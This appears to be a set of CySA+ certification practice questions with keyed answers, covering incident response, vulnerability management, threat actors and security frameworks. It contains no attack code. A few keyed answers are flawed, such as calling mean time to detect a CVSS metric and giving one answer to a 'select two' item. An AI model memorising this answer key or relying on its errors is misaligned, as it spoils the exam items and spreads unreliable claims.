CySa+
An organization has tasked a business leader with writing an executive summary for a cybersecurity incident report that they recently experienced. What key information should the executive include in the summary to provide a clear and concise overview of the incident?
A brief description of the incident, including the date, time, and scope of the attack
Which of the following is an example of unintentional insider threats regarding cybersecurity?
A contractor who accidentally shares confidential information with unauthorized parties
A retail company is developing an incident response plan and wants to test it to ensure it is effective. The company has decided to conduct a tabletop exercise as part of the preparation phase. What would be a tabletop exercise in this context?
A discussion-based exercise that simulates a cyber incident
Which of the following scenarios is the most accurate example of a stack overflow?
A program tries to store more data in the stack than it can handle.
A security analyst is reviewing a vulnerability report and notices that the report has presented the same vulnerability for the past three months. The report also shows that the vulnerability is present in the same system each month. What does this indicate?
A recurring vulnerability trend
A cyber security specialist has concerns about the potential of advanced persistent threats (APTs) to the organization. Which aspect of APTs should the cyber security specialist be most concerned with?
APTs are interested in maintaining access to networks.
Identifying advanced persistent threats (APTs) help organizations protect against cyberattacks. What statement about advanced persistent threats (APTs) is more accurate?
APTs employ anti-forensic techniques to evade detection, making them difficult to identify and prevent.
A security analyst is investigating potential malicious activity associated with an IP address. Which of the following resources can the analyst use to gather information about the reputation of the IP address and determine if there are previous reports of malicious activities associated with it?
AbuseIPDB
An IT administrator wants to improve the organization's cyber defense strategy. The administrator would like to use offensive actions to outmaneuver adversaries, making an attack harder to execute. Which of the following concepts best describes the approach?
Active defense
A retail company's incident response team has noticed a significant increase in the number of alerts generated by its security monitoring tools. The team's concerns are that this increase may lead to alert fatigue and impact the team's ability to detect and respond to real threats. Why is monitoring and managing alert volume an important metric to track? (Select the two best options.)
Alert fatigue reduces the team's effectiveness in detecting and responding to real threats. Monitoring and managing alert volume can improve threat detection accuracy and reduce false positives.
A security manager is responsible for identifying and mitigating insider threats within the organization. The manager has concerns about the potential for intentional insider threats. Which scenario best describes this type of threat?
An employee deliberately causes damage to the organization
A company has detected a security breach in its network, which activated the incident response team. The incident response team must report a detailed timeline of events to provide management with an accurate account of the security breach. The team's report will inform management's decisions about the next steps and help improve future incident response efforts. Why is it important for the team to include these elements in their report?
An incident response timeline helps identify gaps and inefficiencies in the incident response process.
A security team is analyzing their system and network architecture to improve their security posture. In the context of a potential security incident, which aspect should the team prioritize to effectively detect and respond to various types of unauthorized access to critical systems?
Analyzing anomalies in network traffic
A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change?
Application log
An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit?
Broken access control
A hacker finds a vulnerability in a web server within a target organization. By sending specially crafted input to the HTTP service, the hacker exceeds the program's memory capacity and causes the web server to execute arbitrary commands. What type of attack is this?
Buffer overflow
An organization seeks to improve its threat intelligence capabilities by leveraging the MITRE ATT&CK matrices. How can this resource's unique IDs and tactic categories help the organization recognize and protect against specific attacks?
By identifying patterns in TTPs used by threat groups and developing defense strategies
A company has recently discovered that its network has become slow and unreliable, with frequent outages and disruptions. An IT staff member suspects that rogue devices on the network could be causing these issues. What is the best way to identify rogue devices on a network? (Select the three best options.)
Conduct network scans using tools like Nmap to identify active devices on the network. Use intrusion detection systems (IDS) to monitor network traffic and identify devices that do not belong on the network. Utilize Network Access Control (NAC) solutions to authenticate and validate devices before granting network access.
A recently hired project manager is taking over the organization's operational control responsibilities. Which control responsibility would the project manager assume in a cybersecurity environment?
Conducting background checks on new employees
A newly hired cybersecurity manager oversees the organization's operational control responsibilities. Which of the following is an example of this responsibility?
Creating a strong password policy for employees to follow
A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe?
Cryptographic failures
A network administrator receives an alert that the system has detected a cyberattack on the organization's network. The administrator needs to quickly identify the type of attack and take appropriate action to mitigate the threat. What methodology framework can the administrator use to analyze the stages of a cyberattack and understand how to defend against it?
Cyber kill chain
Which of the following are valid mitigation techniques to combat data poisoning? (Select the three best options.)
Data validation Data diversity Anomaly detection
A financial institution is experiencing persistent cyberattacks from unknown sources. What active defense approach can the company deploy to outmaneuver the attackers and gain insights into their methodologies?
Deploy honeypots to attract and identify potential attackers
A network administrator is responsible for ensuring the security of an organization's network. The organization has tasked the administrator with implementing vulnerability scanning methods and concepts to identify potential vulnerabilities. As part of their efforts, the administrator has decided to segment the network. What scanning method would be most helpful in identifying potential vulnerabilities in the segmented network?
Device fingerprinting
A network administrator has noticed a series of unusual network activities that indicate a possible cyberattack. The administrator analyzes the event using a framework that explores the relationships among four core features: adversary, capability, infrastructure, and victim. Which of the following methodologies would the network administrator use for the review?
Diamond model of intrusion analysis
An organization has implemented a system to detect beacon activity by analyzing metadata about all sessions established or attempted. However, this approach can produce many false positives since many legitimate applications also use beaconing. What are some indicators to distinguish between suspicious and legitimate beaconing activity, and why is it important to carefully analyze this type of activity to avoid false positives?
Endpoints, rate and timing of attempts, and size of response packets
A major airline company has suffered a cyberattack that has compromised sensitive customer information, including credit card details and travel itineraries. The company's incident response team has been working to mitigate the damage and contain the breach, but they must also address regulatory reporting requirements. The airline is subject to regulations from multiple governing bodies, including aviation authorities and data protection agencies, and must report the incident within a specific timeframe. What is the importance of regulatory reporting in the airline sector for incident response reporting and communication?
Failure to comply with regulatory reporting requirements can result in hefty fines and legal penalties.
An organization is reviewing its incident response plan and wants to improve its overall security posture by streamlining the authentication process for its employees during a security incident. Which of the following approaches can help achieve this goal without compromising security?
Federation
A company needs to understand the vulnerabilities associated with one of its new web applications. The company requests that the cyber security team identify any issues with the application's input handling. Which method should the team use to best achieve the company's request?
Fuzzing
An activist group that advocates for the protection of animal rights has recently begun carrying out cyberattacks against large food production companies. They have defaced websites, stolen confidential data, and disrupted operations. What type of threat actor group is this?
Hacktivist
During an incident response, a security team has identified a potential data breach on a company's network. Which of the following is a critical step in scoping the incident?
Identifying the affected assets and systems
After detecting a security breach in one of the systems, the network administrator at a large organization faces a highly complex situation that does not allow them to follow the incident response process outlined in the manual. What would be the most appropriate course of action for the network administrator to take if applying compensating controls?
Implement a control that focuses on enhancing the security through a unique method but achieve the same purpose
Which of the following is an example of a technical control in cybersecurity?
Implementing firewalls and antivirus software to prevent unauthorized access and malware infections
A company has decided to implement multifactor authentication (MFA) for its employees to access company systems remotely. What is the primary benefit of using MFA in this scenario?
Improving the security of company systems by adding an extra layer of protection
A cybersecurity team performs a security assessment of a large company's network infrastructure. The team decides to use a passive discovery approach to identify systems, services, and protocols in use on the network. Which of the following methods of passive discovery would be the most effective for the team to use, and how does it work?
Inspecting network traffic using a packet sniffer to identify protocols in use and traffic patterns
A security analyst wants to use a web application scanner to test the security of a web application. Which of the following is a feature of Burp Suite that could support the security analyst's requirements?
Intercepting and modifying HTTP requests and responses
A network administrator reviews the logs in the security information and event management (SIEM) system and notices an alert for anomalous behavior in a relevant log. What should be the next step in the incident response activities, specifically related to Indicators of Compromise (IoCs)?
Investigate the alert further to determine the cause of the anomalous behavior
An IT professional is responsible for identifying potential threats within the organization's isolated network. The professional wants to focus on vulnerabilities that attackers could exploit, even if not connected to the internet. What focus area should the IT professional focus on to achieve this goal?
Isolated network hunting
A company recently suffered a security incident where customer data breaches occurred, causing significant reputational damage. In response, the company's management has requested a report on the incident response team's performance. Within this context, why is measuring the mean time to remediate important for incident response reporting and communication?
It allows the company to track the time to detect and respond to incidents, improving response times.
A financial company has experienced a security breach, and cybersecurity professionals need to analyze data to prioritize vulnerabilities and identify the attack vectors used by cybercriminals. How can the Common Vulnerability Scoring System (CVSS) aid in this process?
It can help to prioritize remediation steps to prevent security incidents.
A company's vulnerability management team has identified a critical vulnerability in its server software. The team has created an action plan to address the vulnerability and has identified patching as a key part of the plan. Why is patching an important part of the action plan?
It can prevent attackers from exploiting the vulnerability and causing damage to the company.
A retail company has recently experienced a data breach and wants to perform a root cause analysis to determine how the breach occurred. Why is a root cause analysis important for incident response reporting and communication in the retail sector? (Select the two best options.)
It helps identify the underlying cause of an incident and prevents similar incidents from occurring in the future. It provides insight into the effectiveness of security controls and identifies areas for improvement.
A large company is considering using virtualization technology to isolate and protect critical systems from potential cyberattacks. What is the benefit of this technology in cybersecurity?
It makes it harder for attackers to breach the network by creating multiple virtual machines secured independently.
A financial company has experienced a data breach that resulted in the exposure of sensitive customer information. As part of the incident response process, the company must document the details of the 5Ws of the incident, including who was involved, what happened, when it occurred, where it took place, and why it happened. What is the significance of recording the 5Ws of an incident in the incident response reporting process?
It provides a clear and complete understanding of the incident.
A retail company is in the process of developing an incident response plan. As part of the preparation phase, the company's security team is creating playbooks to guide incident response procedures. What is the primary benefit the company will realize by developing this tool?
It provides a framework for efficient incident response procedures.
A large corporation seeks to minimize human engagement in its cybersecurity processes. Which of the following is the most direct cybersecurity benefit the corporation will receive by incorporating this process into the organization?
It reduces the risk of human error and increases the speed of response.
A security analyst is scripting a process to collect log data from multiple sources in a network. The analyst needs to choose between using JSON or XML as the format for the script. In this scenario, why would the security analyst choose to use JSON instead of XML for the scripting process?
JSON allows for faster processing of large data sets.
During an investigation into a cybersecurity incident, what steps should the organization take to ensure that host devices and media taken from the crime scene are properly labeled, bagged, and sealed?
Label the devices and media with tamper-evident, antistatic shielding bags, and record evidence collection details on a chain of custody form
A company has contracted a third party to develop a proprietary software application to manage its manufacturing processes. What is a common inhibitor to vulnerability management reporting and communication in this context, specifically for organizations with proprietary systems? (Select the three best options.)
Lack of understanding of the application's underlying architecture and dependencies Fear of revealing proprietary information to external parties Lack of resources to test and remediate vulnerabilities in a proprietary system
An organization has tasked a network administrator with analyzing a recent cyberattack on the system. They want to understand the attack methodology used by the attackers. Which framework can the administrator use to access a database of known tactics, techniques, and procedures (TTPs) used by different threat actor groups?
MITRE ATT&CK
A network administrator has detected irregular P2P communication on the network. What could be the possible cause of this communication?
Malware infection or botnet activity
A company's security monitoring system logs and alerts the security team when suspicious activity occurs. The security administrator discovers that a recent attack was not detected until two weeks after it occurred. What Common Vulnerability Scoring System (CVSS) metric would this affect
Mean time to detect (MTTD)
A company has discovered that sensitive data was leaked to the public. The IT team needs to assess the potential vulnerabilities and identify the attack vectors that could have led to this incident. Which methodology framework can the team use to guide their testing process?
Open Source Security Testing Methodology Manual (OSSTMM)
A company plans to conduct a security test on its systems to identify vulnerabilities and weaknesses. The company has decided to use a framework to ensure they conduct testing thoroughly and consistently. Which methodology framework could the company use to conduct security testing that provides detailed procedures for managing operational security?
Open Source Security Testing Methodology Manual (OSSTMM)
A security administrator wants to scan the company's network for vulnerabilities. Which of these scanners is an open source software developed from the Nessus codebase?
OpenVAS
A system administrator is responsible for maintaining the security and integrity of a company's servers. One critical task involves the system administrator keeping software current and protected from known vulnerabilities. What concept describes this critical task?
Patch management
A company is planning to deploy its applications and services in a cloud environment, with a strong emphasis on ensuring security and maintaining control over its data. Considering these requirements, which cloud deployment model would be most suitable?
Private cloud deployment model
An organization has tasked a network administrator with improving the security of its web applications. The administrator decides to consult the OWASP resources to identify and fix vulnerabilities. Which of the following are key goals of these resources? (Select the three best options.)
Promote open-source software and information sharing Provide training and other resources to improve software security Create awareness of risks and vulnerabilities in software applications
A company has employees working from different sites and needs to ensure secure access to company resources. Which of the following is the primary benefit of using Secure Access Service Edge (SASE) to provide secure access to company resources?
Providing end-to-end protection for all users, regardless of location
A company has tasked a cybersecurity consultant with evaluating new software for vulnerabilities. The consultant wants to understand the methods for uncovering how the software operates. Which of the following methods is most appropriate for this task?
Reverse engineering
An IT professional is responsible for their organization's patch and configuration management. The organization has assigned the professional the task of ensuring that patching and configuration changes get completed safely and efficiently. The professional is also responsible for ensuring rollback plans are in place in case of any problems during the patching or configuration change process. Which of the following statements is true about the IT professional's responsibilities to manage the necessary rollback plans?
Rollback plans are necessary for patching and configuration changes during maintenance windows.
A security consultant uses a software tool to perform security tests for an organization's cloud presence. Which tool will the consultant use in an attempt to gain a list of all virtual machine and storage container instances?
ScoutSuite
An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task?
Shell script
A security analyst is developing a python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the python script to detect obfuscated text? (Select the two best options.)
String manipulation Regular expression
A cybersecurity analyst who works for a large corporation has been analyzing a recent cyber attack that targeted his company's network. The analyst is using both the Cyber Kill Chain and Open Source Security Testing Methodology Manual (OSSTMM) frameworks to analyze the attack. What is the main difference between the Cyber Kill Chain and OSSTMM frameworks in incident response and management?
The Cyber Kill Chain focuses on identifying and analyzing the stages of a cyber attack, while OSSTMM focuses on assessing the maturity level of an organization's security practices.
A cyber technician explores special considerations for scanning after finding gaps in the organization's network. Which of the following is a TRUE statement regarding performance considerations for vulnerability scanning?
The accuracy of the scan results depends on the quality of the vulnerability database used.
A security analyst who has discovered a data breach in an organization's network identified the source of the attack and now must remediate the issue. What is the best course of action for the analyst to take to remediate the issue?
The analyst should patch the affected system to prevent the vulnerability from being exploited again
A company has identified multiple vulnerabilities in its systems, including one critical vulnerability that could potentially cause significant damage if exploited. Which vulnerability should the security team prioritize for remediation?
The critical vulnerability
A large company has recently discovered a vulnerability in its system. After analyzing the data, the company must prioritize the vulnerabilities based on exploitability and weaponization. Which of the following would be important for the company to consider when analyzing the data to achieve their requirements? (Select the two best options.)
The level of sophistication of threat actors targeting the vulnerability The availability of patches for the vulnerability
A company's security team has identified several indicators of compromise (IoCs) in its system logs, including unusual network traffic and the presence of a suspicious file on a system. What actions can the team take to respond to these IoCs? (Select the two best options.)
The team can quarantine and analyze the suspicious file to identify any malware or other security threats it may contain. The team can conduct network traffic analysis to identify the source and destination of the unusual traffic and any associated systems and users.
A company wants to implement vulnerability scanning methods for its IT systems. The company considers using industry frameworks and wants to implement the Center for Internet Security (CIS) benchmarks. What are the benefits of using the CIS Benchmarks for the company's requirements?
They provide specific guidance on how to improve an organization's security posture and reduce overall risk.
A financial institution has detected a potential data breach and has activated its incident response team. As part of the investigation, the team analyzes data and logs. What is the primary purpose of this type of analysis?
To determine the scope of the incident and what data may have been compromised
A security team member detects a potential security breach and begins investigating it. The team member must perform incident response activities during the investigation, including detection and analysis, evidence acquisition, and validating data integrity. What is the purpose of validating data integrity in this scenario?
To ensure no tampering has occurred with the evidence collected
A network administrator for a healthcare organization receives an alert from their security information and event management (SIEM) system indicating a potential breach. Upon further investigation, the administrator discovers that access to patient data has occurred and is potentially exfiltrated. As a result, the network administrator begins to perform incident response activities, including detection and analysis, evidence acquisition, and legal hold. What is the purpose of evidence acquisition in this scenario?
To preserve findings for use in legal proceedings
A company is implementing a PKI to enhance the security of its communications after a recent series of intercepted emails. What is the purpose of PKI in this instance?
To verify the authenticity of digital documents and the identity of users or devices
A cybersecurity analyst uses the Common Vulnerability Scoring System (CVSS) to evaluate the severity of a vulnerability in a company's software. When using the CVSS to evaluate the severity of a software vulnerability, what specific factors should the analyst consider, and why is CVSS an important tool for IT teams to use? (Select the two best options.)
Type of vulnerability, affected system, and potential impact
A cybersecurity analyst is investigating a suspicious process running on a server and discovers unexpected output and registry anomalies. In analyzing these findings, which two considerations should the analyst prioritize to determine the nature of the issue? (Select the two best options.)
Unexpected output can indicate malware activity. Registry anomalies can be indicative of a malware intrusion.
A security administrator reviews a vulnerability report for the company's network infrastructure. What are the best practices for vulnerability reporting? (Select the three best options.)
Using appropriate tools to identify reporting needs and selecting the best tools for those needs Using automation to make the process more consistent, reliable, efficient, and easy to maintain Developing policies and procedures for generating vulnerability reports on a regular schedule
An airline company has implemented a new security system to monitor its online booking system for suspicious activity, such as multiple failed login attempts or a large number of bookings made quickly. The system uses webhooks to trigger automated responses, such as blocking an IP address or alerting the security team. How can an airline company use webhooks to enhance the security of its online booking system?
Webhooks automate messages an airline company uses to monitor suspicious activity.
A web application developer wants to test the security of an application before deploying it to production. Which of the following is a feature of Zed Attack Proxy (ZAP) that would influence the web application developer's decision?
ZAP can automatically generate a report of all vulnerabilities found in the application.
A company is in the process of implementing a vulnerability scanning program to improve its cyber defenses. The company wants to know which scanning method (agent or agentless) would most effectively identify vulnerabilities on its network. What are the advantages of implementing agent
based compared to agentless in this context? (Select the three best options.) -Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources. Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence. Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.
A U.S.
based financial company collects sensitive PII data from its customers, including U.S. social security numbers, biometric information, and financial records. What measures can the company take to protect the data from breaches or unauthorized access? (Select the two best options.) - Implement multi-factor authentication Introduce access controls
An IT professional is responsible for implementing vulnerability scanning methods for their organization's network. The organization has tasked the IT professional with deciding whether to use an agent
based or agentless vulnerability scanning method. What factors should the IT professional consider when making this decision? (Select the two best options.) - The size of the network being scanned The presence of network firewalls
A security analyst needs to automate tasks in a mixed environment with both Windows and Unix
based systems. Which of the following statements accurately differentiates PowerShell and shell scripts in this context? - Both PowerShell and shell scripts are used for automation, but they differ in syntax and are not interchangeable
A network administrator is responsible for securing a large organization's network. The administrator wants to identify potential threats by analyzing network traffic and routine activities. The network administrator believes that focusing on business
critical assets is the most important focus area for threat hunting. Which of the following is a reason to prioritize this focus area? - Attackers often target important assets like databases, servers, or applications.
A large company's cybersecurity team has identified several vulnerabilities in the network, such as a zero
day threat not yet exploited. How should the team prioritize which vulnerabilities to address first? - Prioritize the vulnerabilities that affect critical systems or data
A network administrator analyzes data and prioritizes vulnerabilities to ensure the organization's security. The administrator has received an alert regarding a zero
day vulnerability in one of the organization's critical systems. What factors should the network administrator consider to prioritize this vulnerability? (Select the two best options.) - Impact of the vulnerability Level of sophistication of threat actors
An organization has tasked an IT team with implementing vulnerability scanning methods and concepts. They are considering different industry frameworks to use. Which of the following is a not
for-profit organization that focuses on web application security? - OWASP
A company has just experienced a cyberattack, and its incident response team is in the post
incident activity phase. What is the purpose of forensic analysis during this phase? - To identify the cause, scope, and impact of the incident
A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high
level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment? - Implement strict controls on account creation and privilege assignment
A group of individuals with little to no technical skills has hit a company's website by launching a barrage of cyberattacks. They used pre
packaged tools downloaded from the internet to launch attacks on the company's website servers. What type of threat actor group is this? - Script kiddies
A financial institution is preparing to implement a vulnerability management program to enhance its cybersecurity posture. As part of this process, the organization evaluates potential vulnerability management reporting and communication inhibitors. Within this context, why could a memorandum of understanding (MOU) between the financial institution and a third
party vendor be a common inhibitor to effective vulnerability management reporting and communication? (Select the two best options.) - An MOU may not clearly define the roles and responsibilities of each party for vulnerability management. An MOU may include restrictions on sharing information about vulnerabilities.
A web administrator is responsible for the security of a web application. The administrator wants to prevent cross
site scripting (XSS) attacks where user input is reflected back and executed as part of the web page content. Which of the following best practices should the administrator use to achieve this goal? - Output encoding
A company's cyber security team is responsible for protecting its network against cyber threats. The team wants to gather open
source intelligence (OSINT) on potential threats to the company. Which of the following is a source the team can use to achieve this requirement? - Government bulletins
A cyber security specialist, responsible for threat intelligence and threat hunting in an organization, is looking to collect open
source intelligence (OSINT). The specialist wants to gather intelligence on potential cyber threats. Which sources should the cyber security specialist consider to achieve this information? (Select the two best options.) - Social media profiles HTML code of an organization's web page
A web application that allows users to upload images to their profile has a security vulnerability. An attacker can upload a specially crafted image, causing the web application to try to write data beyond the end of a dynamically allocated portion of memory allocated during run
time. The application does not properly handle the overflow, allowing the attacker to execute arbitrary code on the server. What type of vulnerability does this situation describe (Select the two best options.) -Heap overflow Buffer overflow
